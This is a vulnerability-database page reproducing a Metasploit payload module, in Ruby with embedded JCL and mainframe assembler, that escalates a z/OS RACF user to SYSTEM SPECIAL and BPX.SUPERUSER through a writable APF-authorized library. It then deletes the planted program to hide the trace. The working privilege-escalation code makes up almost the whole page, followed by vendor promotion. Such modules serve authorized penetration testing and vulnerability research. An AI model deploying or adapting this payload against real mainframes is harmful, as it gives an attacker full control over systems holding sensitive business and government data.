Lucene search
K

JCL to Escalate Privileges

🗓️ 11 Apr 2017 20:04:44Reported by Bigendian Smalls, AyoubType 
metasploit
 metasploit
🔗 www.rapid7.com👁 59 Views

This JCL command payload escalates privileges by adding SYSTEM SPECIAL and BPX.SUPERUSER to user profile using an unsecured/updateable APF authorized library (APFLIB) and updating the user's ACEE

Code
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

##
# This is a JCL command payload for z/OS - mainframe.
#   It will escalate privileges of an account on the system if the user
#   can identify a writable APF authorised library "APFLIB"
#
#   See https://www.ibm.com/support/knowledgecenter/zosbasics/com.ibm.zos.zsecurity/zsecc_060.htm
#   for more information on APF Authorized Libraries
#
#   Thank you to Ayoub & The Brummie for the assembler ideas.
#
#   To-do (BeS 4/11/17)
#     Add options for privileges that can be added.
#     Auto scan for writable APF authorized library.
##


module MetasploitModule
  CachedSize = 3156
  include Msf::Payload::Single
  include Msf::Payload::Mainframe

  def initialize(info = {})
    super(merge_info(
      info,
      'Name'          => 'JCL to Escalate Privileges',
      'Description'   => %q{(Elevate privileges for user. Adds
         SYSTEM SPECIAL and BPX.SUPERUSER to user profile. Does this by using
         an unsecured/updateable APF authorized library (APFLIB) and updating
         the user's ACEE using this program/library.  Note: This privesc only
         works with z/OS systems using RACF, no other ESM is supported.)},
      'Author'        =>
        [
          'Bigendian Smalls',
          'Ayoub'
        ],
      'License'        => MSF_LICENSE,
      'Platform'       => 'mainframe',
      'Arch'           => ARCH_CMD,
      'Handler'        => Msf::Handler::None,
      'Session'        => Msf::Sessions::MainframeShell,
      'PayloadType'    => 'cmd',
      'RequiredCmd'    => 'jcl',
      'Payload'        =>
      {
        'Offsets' => {},
        'Payload' => ''
      }
    ))
    register_options(
      [
        Opt::RPORT(21),
        OptString.new('ACTNUM', [true, "Accounting info for JCL JOB card", "MSFUSER-ACCTING-INFO"]),
        OptString.new('PGMNAME', [true, "Programmer name for JCL JOB card", "programmer name"]),
        OptString.new('JCLASS', [true, "Job Class for JCL JOB card", "A"]),
        OptString.new('NOTIFY', [false, "Notify User for JCL JOB card", ""]),
        OptString.new('MSGCLASS', [true, "Message Class for JCL JOB card", "Z"]),
        OptString.new('MSGLEVEL', [true, "Message Level for JCL JOB card", "(0,0)"]),
        OptString.new('APFLIB', [true, "APF Authorized Library to use", "SYS1.LINKLIB"])
      ],
      self.class
    )
    register_advanced_options(
      [
        OptBool.new('NTFYUSR', [true, "Include NOTIFY Parm?", false]),
        OptString.new('JOBNAME', [true, "Job name for JCL JOB card", "DUMMY"])
      ],
      self.class
    )
  end

  ##
  # Construct Payload
  ##
  def generate(_opts = {})
    super + command_string
  end

  ##
  # Setup replacement vars from options if need be
  ##
  def command_string
    jcl_jobcard +
      "//S1        EXEC ASMACLG,PARM.L='AC(1)'\n" \
      "//C.SYSLIB  DD DSN=SYS1.SISTMAC1,DISP=SHR\n" \
      "//          DD DSN=SYS1.MACLIB,DISP=SHR\n" \
      "//L.SYSLMOD DD DISP=SHR,DSN=#{datastore['APFLIB']}(APFPRIV)\n" \
      "//C.SYSIN   DD *,DLM=ZZ\n" \
      "         TITLE  'APF MISCONFIG PRIVESC FOR MSF'\n" \
      "APFPRIV  CSECT\n" \
      "***********************************************************************\n" \
      "*         SETUP registers and save areas                              *\n" \
      "***********************************************************************\n" \
      "MAIN     STM   14,12,12(13)    # Save caller reg\n" \
      "         LR    8,15            # Base register\n" \
      "         USING MAIN,8          # R8 for addressability\n" \
      "         GETMAIN RU,LV=72      # for our savearea\n" \
      "         ST    13,4(,1)        # Store Caller's SA address\n" \
      "         ST    1,8(,13)        # Put my SA addr in caller's SA\n" \
      "         LR    13,1            # R13 has addr of our SA\n" \
      "         DS    0H              # halfword boundaries\n" \
      "***********************************************************************\n" \
      "* MAIN PROGRAM STMTS HERE                                             *\n" \
      "***********************************************************************\n" \
      "         BAL   6,AUTHUSR       # branch authuser routine\n" \
      "         B     EXITP           # exit time\n" \
      "***********************************************************************\n" \
      "* AUTHUSER ROUTINE                                                    *\n" \
      "***********************************************************************\n" \
      "AUTHUSR  MODESET KEY=ZERO,MODE=SUP  # let's get into supervisor mode!\n" \
      "         L     11,X'224'       # R11 points to ASCB\n" \
      "         L     11,X'6C'(11)    # R11 points to ASXB\n" \
      "         L     11,X'C8'(11)    # R11 points to ACEE\n" \
      "         NI    X'26'(11),X'00' # Clear Byte x'26'\n" \
      "         OI    X'26'(11),X'B1' # Add Oper & Special to userproc\n" \
      "         NI    X'27'(11),X'00' # Clear Byte x'27\n" \
      "         OI    X'27'(11),X'80' # ALTER access to all resource\n" \
      "         MODESET KEY=NZERO,MODE=PROB # back to normal\n" \
      "         XR    15,15           # set rc=0 regardless\n" \
      "         BR    6               # R6 has return reg\n" \
      "***********************************************************************\n" \
      "*        Cleanup and exit - R15 has exit code                         *\n" \
      "***********************************************************************\n" \
      "EXITP    LR    1,13            # Move my SA into R1\n" \
      "         LR    2,15            # SAVE RC\n" \
      "         L     13,4(,13)       # RST Caller SA Addr\n" \
      "         L     14,12(13)       # Reload R14\n" \
      "         FREEMAIN RU,A=(1),LV=72\n" \
      "         LR    15,2            # RESTORE RC\n" \
      "         LM    0,12,20(13)     # Reload all but 14/15\n" \
      "         BCR   15,14           # Branch back to caller\n" \
      "         END   APFPRIV            # end pgm\n" \
      "ZZ\n" \
      "//S2        EXEC PGM=IKJEFT01\n" \
      "//SYSTSIN   DD *\n" \
      " ALU #{datastore['FTPUSER']} SPECIAL\n" \
      " PE BPX.SUPERUSER CLASS(FACILITY) ID(#{datastore['FTPUSER']}) ACCESS(READ)\n" \
      " SETR RACL(FACILITY) REF\n" \
      "/*\n" \
      "//SYSIN     DD DUMMY\n" \
      "//SYSTSPRT  DD SYSOUT=*\n" \
      "//S3        EXEC PGM=IDCAMS\n" \
      "//SYSPRINT  DD SYSOUT=*\n" \
      "//TEMPDD    DD DSN=#{datastore['APFLIB']},DISP=SHR\n" \
      "//SYSIN     DD *\n" \
      " DELETE #{datastore['APFLIB']}(APFPRIV) FILE(TEMPDD)\n" \
      "/*\n" \
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Nov 2022 02:10Current
7.3High risk
Vulners AI Score7.3
59